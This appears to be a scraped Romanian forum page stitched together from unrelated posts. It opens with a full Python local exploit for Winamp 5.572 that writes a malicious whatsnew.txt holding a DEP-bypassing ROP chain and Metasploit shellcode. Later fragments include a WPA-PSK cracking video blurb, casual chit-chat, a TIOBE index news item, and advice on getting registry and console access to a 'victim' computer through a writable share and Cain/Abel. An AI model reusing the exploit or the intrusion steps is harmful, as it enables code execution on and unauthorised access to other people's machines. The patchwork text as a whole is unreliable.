begood

#!/usr/bin/python # # Title: Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass) # Author: Rocco Calvi aka TecR0c - http://tecninja.net/blog | http://twitter.com/TecR0c # Found BY: Debug # Date: June 18th, 2010 # Platform: Windows XP sp3 En # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # Special thanks to mr_me for making me try harder and lincoln # Usage stage 1 : Replace existing whatsnew.txt file with evil whatsnew.txt # Usage stage 2 : Launch Application > Help > About Winamp > Version History > BOOM! print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] Winamp 5.572 (whatnews.txt) DEP Bypass - by TecR0c" # http://www.metasploit.com # EXITFUNC=process, CMD=calc.exe sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" "\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47" "\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c" "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46" "\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45" "\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c" "\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c" "\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44" "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46" "\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50" "\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44" "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" "\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43" "\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b" "\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43" "\x51\x42\x4c\x42\x43\x43\x30\x41\x41"); version = "Winamp 5.572" rop = "\x41" * 540 # Crash rop += "\x09\x12\x0e\x07" # 0x070E1209 : {POP} # POP EDI # POP ESI # POP EBP # XOR EAX,EAX # POP EBX # RETN [Module : nde.dll] rop += "\xee\xff\xff\xc0" # 0xc0ffffee : Junk rop += "\xee\xff\xff\xc0" # 0xc0ffffee : Junk rop += "\xee\xff\xff\xc0" # 0xc0ffffee : Junk rop += "\xee\xff\xff\xc0" # 0xc0ffffee : Junk rop += "\x03\x85\x09\x07" # 0x07098503 : EAX CALL rop += "\xee\xff\xff\xc0" # 0xc0ffffee : Junk rop += "\xee\xff\xff\xc0" # 0xc0ffffee : Junk rop += "\xff\xff\xff\xff" # 0xffffffff : for EBX rop += "\xc5\x01\x5a\x78" # 0x785A01C5 : # POP EDX # RETN [Module : MSVCR90.dll] rop += "\x10\xe0\x10\x07" # 0x07100e01 : Writeable Address rop += "\x46\x17\x5a\x78" # 0x785A1746 : # ADD EAX,40 # POP EBP # RETN [Module : MSVCR90.dll] rop += "\xee\xff\xff\xc0" # 0xc0ffffee : Junk rop += "\x6e\x22\x97\x7c" # 0x7C97226E : # ADD EAX,100 # POP EBP # RETN rop += "\xcf\x22\x80\x7c" # 0x7C8022CF : dest address in WriteProcessMemory() rop += "\xcf\xc9\x0e\x07" # 0x070EC9CF : # ADD EBX,EAX # XOR AL,AL # RETN [Module : nde.dll] rop += "\x5e\x89\x09\x07" # 0x0709895E : {POP} # POP EAX # POP ESI # RETN [Module : libsndfile.dll] rop += "\x13\x22\x80\x7c" # 0x7C802213 : WriteProcessMemory rop += "\xff\xff\xff\xff" # 0xffffffff : HProcess HANDLE (-1) rop += "\x65\x08\x59\x78" # 0x78590865 : # PUSHAD # RETN [Module : MSVCR90.dll] junk = "\x43" * 800 tecfile = open('whatsnew.txt','w') tecfile.write(version + rop + sc + junk) tecfile.close()

This video talks about auditing or breaking WPA and WPA2 PSK authentication on wireless networks. David Hoelzer gives a ten minute demonstration explaining all of the steps necessary to demonstrate the insecurity if pre-shared keys are used. You can visit his site here. How to Audit WPA Networks Tutorial

ar fi interesant de incercat

trist...

bonus daca sunt romanesti

moromete a murit singur. io zic sa incerci sa te alaturi echipei. o sa vezi ca te plitisesti la un moment dat de blog + nu primesti feedback-ul dorit => o sa te lasi. daca vrei vorbesc eu cu andrewboy

de ce nu scrii pentru worldit.info ?

Citind stirea de aici si primind un reply de la un oarecare bogdan am deschis topicul. In ce consta concursul ? Trebuie sa scrieti un program/script nu ma intereseaza in ce limbaj, doar sa fie rapid, care creeze un fisier cu numele userilor, unul pe rand. Premii ? O portocala de la begood. Daca vrea cineva sa sponsorizeze, ma contacteaza prin PM sau in acest topic. Cine castiga ? 2 castigatori : cel care posteaza primul 1 milion de useri, fara duplicaturi si cel care face cel mai rapid/eficient script/program. Sa va vad !

ce mai faci ?

ascult Hard sun si pap turt? dulce.

am vandut azi deja vreo 50 de sosete.

remoulade ?

imi aduce mami o farfurie plina cu carnaciori fripti in sucul propriu cu ce sos sa-i asortez ?

miroase bine ?

ce-i aia steam ? miroase bine ? eu primesc frezii de la buni...

ai floricele mici si frumoase ?

roz bonbon cu picatele albe

aduce buni flori de gradina

June Headline: Google's Go falls out of top 20 Since its release in November 2009 Google's Go was part of the TIOBE top 20. Its initial rise was so phenomenal that it was declared "Programming Language of the Year 2009". After its first, curiosity-driven hype, the language needs to find its place in the programming language landscape now. Some say its multicore support is something that is needed nowadays, others criticize the language for not being mature yet to be adopted by professionals. We will see in the next few months what is going to happen. Other interesting changes in June are: Java is back at number 1, changing places with C. Objective-C is still rising (climbing from 10 to 9 in one month), and Powershell has entered the top 20. The TIOBE Programming Community index gives an indication of the popularity of programming languages. The index is updated once a month. The ratings are based on the number of skilled engineers world-wide, courses and third party vendors. The popular search engines Google, MSN, Yahoo!, Wikipedia and YouTube are used to calculate the ratings. Observe that the TIOBE index is not about the best programming language or the language in which most lines of code have been written. The index can be used to check whether your programming skills are still up to date or to make a strategic decision about what programming language should be adopted when starting to build a new software system. The definition of the TIOBE index can be found here. grafice : TIOBE Software: The Coding Standards Company

deci. va rog nu deviati de la topic. strig dupa o umbrela !

mi-a luat-o vantu ieri seara pe la 11 juma, in drum spre casa de la cofetarie are cineva o umbrela de imprumut ? galbena sa fie, vreau sa se asorteze cu colantii mei

iar eu trebuie sa merg dupa bunica la gara sper sa nu pice pana la patru..

pai dupa ce gasesti ce e modificat, poti scrie / ii dai lu nytro sa-ti scrie un programel mic, e simplu in vb6

cauti / pui un writable share pe computerul victima. instalezi cain si te conectezi la computerul in cauza cunoscandu-i ip-ul. instalezi serviciul "abel" si ai acces la registrii si la consola. iar de aici poate gasesti tu o solutie pentru modificarea volumului. LE: n-am gasit o solutie pentru modificarea volumului, doar enable/disable din registrii. probabil nici nu se poate, setarile fiind in memoria RAM, acolo ar trebui sa se faca modificarile => trebuie sa gasesti locatia in memorie si sa o rescrii cu ajutorul unui patcher... (parere, nu sunt sigur) poate te ajuta asta compara doua valori diferite ale volumului si vezi ce se modifica/daca se modifica

This is fuckin amusing.. Nu e o idee rea, desi mi se pare clar drumul in care bat